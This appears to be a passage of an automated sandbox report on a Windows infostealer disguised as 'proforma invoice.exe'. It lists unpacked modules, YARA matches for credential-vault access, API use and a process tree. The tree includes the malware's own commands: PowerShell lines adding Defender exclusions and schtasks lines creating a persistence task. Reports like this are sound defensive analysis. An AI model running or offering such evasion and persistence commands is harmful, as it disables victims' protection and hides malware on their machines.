Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_094654E8	0_2_094654E8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_015B3690	9_2_015B3690
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_015B2970	9_2_015B2970
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_015B2960	9_2_015B2960
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_05E3D1C8	9_2_05E3D1C8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_05E37018	9_2_05E37018
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_05E34658	9_2_05E34658
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_05E34310	9_2_05E34310
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_05E34F28	9_2_05E34F28
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_072387E8	9_2_072387E8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_0723B3D0	9_2_0723B3D0
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_072332E0	9_2_072332E0
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_072359C0	9_2_072359C0
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_07230040	9_2_07230040
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_07239C48	9_2_07239C48
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_0723E888	9_2_0723E888
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_07230006	9_2_07230006
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_0723ACF0	9_2_0723ACF0
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_05E30040	9_2_05E30040
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_05E30007	9_2_05E30007
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01542530	10_2_01542530
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01540871	10_2_01540871
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01541360	10_2_01541360
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_015434B8	10_2_015434B8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01549B84	10_2_01549B84
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01541B8A	10_2_01541B8A
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01549CF8	10_2_01549CF8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0154A33F	10_2_0154A33F
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_015443C0	10_2_015443C0
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_015443B0	10_2_015443B0
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01544F18	10_2_01544F18
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01544F08	10_2_01544F08
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_015433A8	10_2_015433A8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_015412D2	10_2_015412D2
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0154557A	10_2_0154557A
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01545588	10_2_01545588
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_015457D1	10_2_015457D1
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_015457E0	10_2_015457E0
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01545A40	10_2_01545A40
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01545A30	10_2_01545A30
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_01549CE8	10_2_01549CE8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A370370	10_2_0A370370
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A370360	10_2_0A370360
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A3733D8	10_2_0A3733D8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A373810	10_2_0A373810
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A374080	10_2_0A374080
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A373C48	10_2_0A373C48
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A3754E8	10_2_0A3754E8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A37ADF8	10_2_0A37ADF8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A521C20	10_2_0A521C20
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A522118	10_2_0A522118
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A521C00	10_2_0A521C00
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_02B23690	14_2_02B23690
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_02B22970	14_2_02B22970
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_02B22960	14_2_02B22960
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_062D4310	14_2_062D4310
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_062D7018	14_2_062D7018
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_062DD1C8	14_2_062DD1C8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_062D4F28	14_2_062D4F28
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_062D4658	14_2_062D4658
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C287E8	14_2_06C287E8
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C29C48	14_2_06C29C48
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C205D6	14_2_06C205D6
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C2B3D0	14_2_06C2B3D0
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C2E888	14_2_06C2E888
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C2ACF0	14_2_06C2ACF0

Source: proforma invoice.exe, 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec5ea4fda-43b2-4fc0-8a8b-07958574f042.exe4 vs proforma invoice.exe
Source: proforma invoice.exe, 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs proforma invoice.exe
Source: proforma invoice.exe, 00000000.00000002.1344796057.00000000028FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs proforma invoice.exe
Source: proforma invoice.exe, 00000000.00000002.1380605635.00000000076A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs proforma invoice.exe
Source: proforma invoice.exe, 00000000.00000002.1343853248.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs proforma invoice.exe
Source: proforma invoice.exe, 00000000.00000002.1381925613.00000000093D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs proforma invoice.exe
Source: proforma invoice.exe, 00000000.00000000.1320380596.0000000000490000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNjPDP.exe( vs proforma invoice.exe
Source: proforma invoice.exe, 00000000.00000002.1344796057.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec5ea4fda-43b2-4fc0-8a8b-07958574f042.exe4 vs proforma invoice.exe
Source: proforma invoice.exe, 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec5ea4fda-43b2-4fc0-8a8b-07958574f042.exe4 vs proforma invoice.exe
Source: proforma invoice.exe, 00000009.00000002.2578544350.00000000012F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs proforma invoice.exe
Source: proforma invoice.exe	Binary or memory string: OriginalFilenameNjPDP.exe( vs proforma invoice.exe

Source: proforma invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.proforma invoice.exe.416aec8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: proforma invoice.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: CGWlZD.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, RsYAkkzVoy.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, Kqqzixk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, xROdzGigX.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, ywes.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, iPVW0zV.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, 1Pi9sgbHwoV.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, YUgDfWK2g4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, YUgDfWK2g4.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, MarWtcu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, MarWtcu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, MarWtcu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, MarWtcu.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: _0020.SetAccessControl
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, mfjQw5qpQAlqUAiSkP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: _0020.SetAccessControl
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: _0020.SetAccessControl
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, jA2dlspLgAa2OFDOi4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, mfjQw5qpQAlqUAiSkP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, mfjQw5qpQAlqUAiSkP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/13@2/2

Source: C:\Users\user\Desktop\proforma invoice.exe

File created: C:\Users\user\AppData\Roaming\CGWlZD.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03

Source: C:\Users\user\Desktop\proforma invoice.exe

File created: C:\Users\user\AppData\Local\Temp\tmp4844.tmp

Jump to behavior

Source: proforma invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: proforma invoice.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\proforma invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\proforma invoice.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: proforma invoice.exe	ReversingLabs: Detection: 65%
Source: proforma invoice.exe	Virustotal: Detection: 56%

Source: unknown	Process created: C:\Users\user\Desktop\proforma invoice.exe "C:\Users\user\Desktop\proforma invoice.exe"
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CGWlZD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Users\user\Desktop\proforma invoice.exe "C:\Users\user\Desktop\proforma invoice.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\CGWlZD.exe "C:\Users\user\AppData\Roaming\CGWlZD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process created: C:\Users\user\AppData\Roaming\CGWlZD.exe "C:\Users\user\AppData\Roaming\CGWlZD.exe"
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CGWlZD.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Users\user\Desktop\proforma invoice.exe "C:\Users\user\Desktop\proforma invoice.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process created: C:\Users\user\AppData\Roaming\CGWlZD.exe "C:\Users\user\AppData\Roaming\CGWlZD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
